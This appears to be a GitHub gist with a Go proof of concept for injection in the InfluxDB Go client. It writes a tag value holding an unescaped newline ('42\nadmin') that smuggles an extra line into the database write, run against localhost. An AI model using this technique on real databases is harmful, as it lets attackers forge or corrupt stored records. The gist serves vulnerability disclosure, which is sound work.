Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
PoC for command injection in the InfluxDB Go client
package main
import (
"log"
"time"
client "github.com/influxdata/influxdb/client/v2"
)
const database = "poc"
func main() {
c, err := client.NewHTTPClient(client.HTTPConfig{
Addr: "http://localhost:8086",
})
if err != nil {
log.Fatal(err)
}
defer c.Close()
// Create a new point batch
bp, err := client.NewBatchPoints(client.BatchPointsConfig{
Database: database,
Precision: "s",
})
if err != nil {
log.Fatal(err)
}
// Create a point and add to batch
tags := map[string]string{
// newlines are not escaped in tag values
"tag1": "42\nadmin",
}
fields := map[string]interface{}{
// newlines are escaped when in field value
"field1": "anyvalue",
}
pt, err := client.NewPoint("poc", tags, fields, time.Now())
if err != nil {
log.Fatal(err)
}
bp.AddPoint(pt)
// Write the batch
err = c.Write(bp)
if err != nil {
log.Fatal(err)
}
// Close client resources
err = c.Close()
if err != nil {
log.Fatal(err)
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.